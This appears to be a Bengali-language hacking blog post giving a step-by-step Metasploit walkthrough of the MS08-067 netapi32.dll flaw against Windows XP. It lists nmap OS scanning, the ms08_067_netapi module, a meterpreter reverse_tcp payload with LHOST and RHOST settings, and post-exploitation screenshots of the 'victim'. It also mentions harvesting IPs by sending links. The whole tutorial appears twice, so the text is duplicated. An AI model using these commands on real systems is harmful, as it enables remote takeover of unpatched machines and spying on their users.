এটা একটু Advance Level এর হ্যাকিং।অনেকেরই হয়ত
বুঝতে অসুবিধা হতে পারে।সেক্ষত্রে কমেন্টস করুন
শুধু কি IP সিস্টম হ্যাক করা সম্ভব, হ্যা। কারন
NetAPI32.dll(CVE-2008-4250)দুর্বলতা।.[netapi32.dll is a
module that contains the Windows NET API used by
applications to access a Microsoft network]
(Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for
sharing resources such as files and print services over
the network.
The Server service is vulnerable to a remote code-
execution vulnerability. The vulnerability is caused due to
an error in netapi32.dll when processing directory
traversal character sequences in path names. This can be
exploited to corrupt stack memory by e.g. sending RPC
requests containing specially crafted path names to the
Server Service component. The ‘NetprPathCanonicalize()’
function in the ‘netapi32.dll’ file is affected.
A malicious request to vulnerable system results in
complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000,
Windows Server 2003, Windows Vista, and Windows
Server 2008. But Attackers require authenticated access
on Windows Vista and Server 2008 platforms to exploit
this issue.
Exploiting the MS08-067 using Metasploit)
আপনার টার্গেট সিস্টেম যদি Vulnerable OS ব্যবহার
করে তাহলে আপনি তাকে খুব সহজেই হ্যাক করতে
পারবেন।
এই প্রক্রিয়া সম্পন্ন করতে যেগুলো প্রয়োজনঃ
Virtual Box
Backtrack 5
Target OS
Step One: Create Virtual Machine
দুইটি Virtual Machine তৈরি করুন, একটার নাম দিন
Target OS এবং অন্যটার নাম দিন BT5।
Target OS এ
Windows XP Install করুন, এবং BT5 এ Backtreack 5
Install করুন।
আপনার যদি Virtual Machine সম্পর্কে ধারনা না
থাকে তাহলে VM Manual পড়ুন।
Step Two: Find the IP address of Target
Target এর IP বের করার জন্য VM(XP)তে cmd prompt
ওপেন করুন(W+R+cmd and hit enter)
এবং টাইপ করুন ipconfig এবং Enter প্রেস করুন।
(সাধারনত Advance হ্যাকাররা IP জানতে অন্য ধরনের
পদ্ধতি অনুসরন করে
যেমনঃ Angry IP Scanner বা লিঙ্ক পাঠিয়ে ও অনেকেই IP
বের করেন।
Step three:
এবার আমরা namp tool ব্যবহার করব।BT5(Backtrack 5)
Start করুন এবং Terminal Open করুন Type করুনঃ
nmap -O 192.168.56.12
এখানে 192.168.56.12 হল Target machine এর IP ।
ফলাফল দেখুন, আপনি টার্গেট এর open port এবং OS
দেখতে পাবেন।
Step four: Metasploit
এবার BT5 এর Terminal ওপেন করুন, (Ctrl+Alt+T)এবং
টাইপ করুন msfconsole। Msfconsole, Metasploit
Framework এর সবচেয়ে জনপ্রিয় একটা বৈশিষ্ট্য।
এবার আমরা সার্চ কমান্ড ব্যবহার করব।, এজন্য
“search netapi” টাইপ করুন।
এবার আপনি অবশ্যই netapi
এর সাথে Module Match লিস্ট দেখতে পাবেন।
এবার আমরা MS08-067, exploit করব।সুতরাং টাইপ
করুনঃ
“use exploit/windows/smb/ms08_067_netapi“
Step 5: Set Payload
Type “set payload windows/meterpreter/reverse_tcp” in
the msfconsole.
Step 6: Options
Type “set LHOST 192.168.56.10“. এখানে
192.168.56.10 হল Backtrack এর IP। আপনি
টার্মিনালে ‘ifconfig’ লিখেও এটা পেতে পারেন।
এবার Type “set RHOST 192.168.56.12“ এখানে
192.168.56.12 হল টার্গেট মেশিন এর IP।
Step 7: Exploiting
এবার এটা দুর্বলতার সুযোগ নেয়ার সময় সুতরাং
type “exploit” in the console, যদি এক্সপ্লয়েট
সাক্সেস হয় টাহলে আপনিও নিচের মত ফলাফল
দেখতে পাবেন।
এখন আপনি Remote Computer কে নিজের মত Control
করতে পারবেন।যেমন Screen Shot নেয়ার জন্য টাইপ
করুন,
“screenshot”
এবং দেখুন আপনার ভিক্টিমের Screen Shot ?
ধন্যবাদ ভাল থাকবেন।
বুঝতে অসুবিধা হতে পারে।সেক্ষত্রে কমেন্টস করুন
শুধু কি IP সিস্টম হ্যাক করা সম্ভব, হ্যা। কারন
NetAPI32.dll(CVE-2008-4250)দুর্বলতা।.[netapi32.dll is a
module that contains the Windows NET API used by
applications to access a Microsoft network]
(Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for
sharing resources such as files and print services over
the network.
The Server service is vulnerable to a remote code-
execution vulnerability. The vulnerability is caused due to
an error in netapi32.dll when processing directory
traversal character sequences in path names. This can be
exploited to corrupt stack memory by e.g. sending RPC
requests containing specially crafted path names to the
Server Service component. The ‘NetprPathCanonicalize()’
function in the ‘netapi32.dll’ file is affected.
A malicious request to vulnerable system results in
complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000,
Windows Server 2003, Windows Vista, and Windows
Server 2008. But Attackers require authenticated access
on Windows Vista and Server 2008 platforms to exploit
this issue.
Exploiting the MS08-067 using Metasploit)
আপনার টার্গেট সিস্টেম যদি Vulnerable OS ব্যবহার
করে তাহলে আপনি তাকে খুব সহজেই হ্যাক করতে
পারবেন।
এই প্রক্রিয়া সম্পন্ন করতে যেগুলো প্রয়োজনঃ
Virtual Box
Backtrack 5
Target OS
Step One: Create Virtual Machine
দুইটি Virtual Machine তৈরি করুন, একটার নাম দিন
Target OS এবং অন্যটার নাম দিন BT5।
Target OS এ
Windows XP Install করুন, এবং BT5 এ Backtreack 5
Install করুন।
আপনার যদি Virtual Machine সম্পর্কে ধারনা না
থাকে তাহলে VM Manual পড়ুন।
Step Two: Find the IP address of Target
Target এর IP বের করার জন্য VM(XP)তে cmd prompt
ওপেন করুন(W+R+cmd and hit enter)
এবং টাইপ করুন ipconfig এবং Enter প্রেস করুন।
(সাধারনত Advance হ্যাকাররা IP জানতে অন্য ধরনের
পদ্ধতি অনুসরন করে
যেমনঃ Angry IP Scanner বা লিঙ্ক পাঠিয়ে ও অনেকেই IP
বের করেন।
Step three:
এবার আমরা namp tool ব্যবহার করব।BT5(Backtrack 5)
Start করুন এবং Terminal Open করুন Type করুনঃ
nmap -O 192.168.56.12
এখানে 192.168.56.12 হল Target machine এর IP ।
ফলাফল দেখুন, আপনি টার্গেট এর open port এবং OS
দেখতে পাবেন।
Step four: Metasploit
এবার BT5 এর Terminal ওপেন করুন, (Ctrl+Alt+T)এবং
টাইপ করুন msfconsole। Msfconsole, Metasploit
Framework এর সবচেয়ে জনপ্রিয় একটা বৈশিষ্ট্য।
এবার আমরা সার্চ কমান্ড ব্যবহার করব।, এজন্য
“search netapi” টাইপ করুন।
এবার আপনি অবশ্যই netapi
এর সাথে Module Match লিস্ট দেখতে পাবেন।
এবার আমরা MS08-067, exploit করব।সুতরাং টাইপ
করুনঃ
“use exploit/windows/smb/ms08_067_netapi“
Step 5: Set Payload
Type “set payload windows/meterpreter/reverse_tcp” in
the msfconsole.
Step 6: Options
Type “set LHOST 192.168.56.10“. এখানে
192.168.56.10 হল Backtrack এর IP। আপনি
টার্মিনালে ‘ifconfig’ লিখেও এটা পেতে পারেন।
এবার Type “set RHOST 192.168.56.12“ এখানে
192.168.56.12 হল টার্গেট মেশিন এর IP।
Step 7: Exploiting
এবার এটা দুর্বলতার সুযোগ নেয়ার সময় সুতরাং
type “exploit” in the console, যদি এক্সপ্লয়েট
সাক্সেস হয় টাহলে আপনিও নিচের মত ফলাফল
দেখতে পাবেন।
এখন আপনি Remote Computer কে নিজের মত Control
করতে পারবেন।যেমন Screen Shot নেয়ার জন্য টাইপ
করুন,
“screenshot”
এবং দেখুন আপনার ভিক্টিমের Screen Shot ?
ধন্যবাদ ভাল থাকবেন।
Posts by Md Motalib Hossain
Hi,My Name Is Md Motalib Hossain. I am Admin of this blog.I love blogging and I like to share things which I know.Follow Me On Twitter Or Facebook
0 Reviews:
Post Your Review